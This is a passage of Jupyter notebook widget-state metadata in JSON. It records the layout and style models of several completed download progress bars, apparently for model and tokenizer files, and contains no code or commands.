"layout": "IPY_MODEL_f51970b3c1c549a69c51de95909e2105",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_6f57dcc2e6514dc593020a36a812dd2d",
"IPY_MODEL_18975982ec1e4de8b4f0c665364926ba",
"IPY_MODEL_7fbfeabe51a14620a520cb5cbba15945"
]
}
},
"f51970b3c1c549a69c51de95909e2105": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"6f57dcc2e6514dc593020a36a812dd2d": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_dead2cfeeb9541e6b63a3e17327b8b85",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6091e5ed880b4342aeee6fab8ee77dad"
}
},
"18975982ec1e4de8b4f0c665364926ba": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_730d7b36b5254c1a9a6e97d429f7c083",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 2444714899,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 2444714899,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_d41435a1cc8d49119664466716ac5a9c"
}
},
"7fbfeabe51a14620a520cb5cbba15945": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_5ddb070811d04b2891ffaaaff381cc1c",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 2.44G/2.44G [01:12<00:00, 36.5MB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_609284e60209444fb1a86f5d803d16b1"
}
},
"dead2cfeeb9541e6b63a3e17327b8b85": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"6091e5ed880b4342aeee6fab8ee77dad": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"730d7b36b5254c1a9a6e97d429f7c083": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"d41435a1cc8d49119664466716ac5a9c": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"5ddb070811d04b2891ffaaaff381cc1c": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"609284e60209444fb1a86f5d803d16b1": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"d8ddbf1f4d33471cbb4a45f2a82c830e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_0ded282a4598481db2831db11c45cc06",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_0e98a3fb81be4eb7be56f6c54f3453eb",
"IPY_MODEL_1ad806b735cb4b7b83b63dfff1009cb1",
"IPY_MODEL_877fdb214729497c8756a82ff97208f2"
]
}
},
"0ded282a4598481db2831db11c45cc06": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"0e98a3fb81be4eb7be56f6c54f3453eb": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_17dea81fe42a4d31b5239dec9cfbf446",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6583cc2d5bb0439e8c3d6f4d607dfb7e"
}
},
"1ad806b735cb4b7b83b63dfff1009cb1": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_a8bc0bade21b4715a5dc62594a16d0c9",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 529,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 529,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_6e9b9d7ca93540bba92c33b4fd9f295e"
}
},
"877fdb214729497c8756a82ff97208f2": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_3cc33b5d60f641d5bc81eb6f60bfcd1e",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 529/529 [00:00<00:00, 13.6kB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_847c55b3901f4601803dd31828cffc93"
}
},
"17dea81fe42a4d31b5239dec9cfbf446": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"6583cc2d5bb0439e8c3d6f4d607dfb7e": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"a8bc0bade21b4715a5dc62594a16d0c9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"6e9b9d7ca93540bba92c33b4fd9f295e": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"3cc33b5d60f641d5bc81eb6f60bfcd1e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"847c55b3901f4601803dd31828cffc93": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"3b558d4bff2241ad949cfe4b27000ff8": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_8488584c8f814eb88197cbcf5eaf8487",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_29ca8786126e4e9b897de5426ec009a9",
"IPY_MODEL_fde487b2fd4b4095991e408a24e81042",
"IPY_MODEL_fe982e314fba4aad95092dd54983f300"
]
}
},
"8488584c8f814eb88197cbcf5eaf8487": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"29ca8786126e4e9b897de5426ec009a9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_33f2761b5013498e8333785833ea668d",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_040fc5c9d53746928e21663d44ee5187"
}
},
"fde487b2fd4b4095991e408a24e81042": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_3ee1821930ce4279a28c771ae06d0acf",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 5069051,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 5069051,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_be27dd7477bc45c1a98fb723a236937b"
}
},
"fe982e314fba4aad95092dd54983f300": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_b4f4ec01371442d3a50a552e5ed2cff2",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 5.07M/5.07M [00:00<00:00, 24.8MB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_0a4bb6df135e42148a838620d7ac36be"
}
},
"33f2761b5013498e8333785833ea668d": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"040fc5c9d53746928e21663d44ee5187": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"3ee1821930ce4279a28c771ae06d0acf": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"be27dd7477bc45c1a98fb723a236937b": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"b4f4ec01371442d3a50a552e5ed2cff2": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"0a4bb6df135e42148a838620d7ac36be": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"1b3b94e8b9f1485f920956b3d80a187c": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HBoxModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HBoxView",
"_dom_classes": [],
"_model_name": "HBoxModel",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.5.0",
"box_style": "",
"layout": "IPY_MODEL_af8d9db3bf404a29975ce2dc0dfcfb4f",
"_model_module": "@jupyter-widgets/controls",
"children": [
"IPY_MODEL_87d6049157324e878cac7021fbf6e218",
"IPY_MODEL_e3420824fef140b1b45da3823e167cd9",
"IPY_MODEL_41dbf83a749346738f8a671e196e5a1e"
]
}
},
"af8d9db3bf404a29975ce2dc0dfcfb4f": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"87d6049157324e878cac7021fbf6e218": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_32feb77b17fb4c75a4b93ab17972872e",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": "Downloading: 100%",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_289662f6aa6946f08613ce07855e9b8d"
}
},
"e3420824fef140b1b45da3823e167cd9": {
"model_module": "@jupyter-widgets/controls",
"model_name": "FloatProgressModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "ProgressView",
"style": "IPY_MODEL_389acd5078e64ed592145f344da8fc98",
"_dom_classes": [],
"description": "",
"_model_name": "FloatProgressModel",
"bar_style": "success",
"max": 649,
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": 649,
"_view_count": null,
"_view_module_version": "1.5.0",
"orientation": "horizontal",
"min": 0,
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_34c6f99ff0854c4da84e56c03acceebf"
}
},
"41dbf83a749346738f8a671e196e5a1e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "HTMLModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "HTMLView",
"style": "IPY_MODEL_389fd8956d6d4747ba71d510f19b1d1c",
"_dom_classes": [],
"description": "",
"_model_name": "HTMLModel",
"placeholder": "",
"_view_module": "@jupyter-widgets/controls",
"_model_module_version": "1.5.0",
"value": " 649/649 [00:00<00:00, 9.66kB/s]",
"_view_count": null,
"_view_module_version": "1.5.0",
"description_tooltip": null,
"_model_module": "@jupyter-widgets/controls",
"layout": "IPY_MODEL_bb7153ca8bdd4c7293f20a8373b8156b"
}
},
"32feb77b17fb4c75a4b93ab17972872e": {
"model_module": "@jupyter-widgets/controls",
"model_name": "DescriptionStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "DescriptionStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"_model_module": "@jupyter-widgets/controls"
}
},
"289662f6aa6946f08613ce07855e9b8d": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
"min_width": null,
"border": null,
"align_items": null,
"bottom": null,
"_model_module": "@jupyter-widgets/base",
"top": null,
"grid_column": null,
"overflow_y": null,
"overflow_x": null,
"grid_auto_flow": null,
"grid_area": null,
"grid_template_columns": null,
"flex": null,
"_model_name": "LayoutModel",
"justify_items": null,
"grid_row": null,
"max_height": null,
"align_content": null,
"visibility": null,
"align_self": null,
"height": null,
"min_height": null,
"padding": null,
"grid_auto_rows": null,
"grid_gap": null,
"max_width": null,
"order": null,
"_view_module_version": "1.2.0",
"grid_template_areas": null,
"object_position": null,
"object_fit": null,
"grid_auto_columns": null,
"margin": null,
"display": null,
"left": null
}
},
"389acd5078e64ed592145f344da8fc98": {
"model_module": "@jupyter-widgets/controls",
"model_name": "ProgressStyleModel",
"model_module_version": "1.5.0",
"state": {
"_view_name": "StyleView",
"_model_name": "ProgressStyleModel",
"description_width": "",
"_view_module": "@jupyter-widgets/base",
"_model_module_version": "1.5.0",
"_view_count": null,
"_view_module_version": "1.2.0",
"bar_color": null,
"_model_module": "@jupyter-widgets/controls"
}
},
"34c6f99ff0854c4da84e56c03acceebf": {
"model_module": "@jupyter-widgets/base",
"model_name": "LayoutModel",
"model_module_version": "1.2.0",
"state": {
"_view_name": "LayoutView",
"grid_template_rows": null,
"right": null,
"justify_content": null,
"_view_module": "@jupyter-widgets/base",
"overflow": null,
"_model_module_version": "1.2.0",
"_view_count": null,
"flex_flow": null,
"width": null,
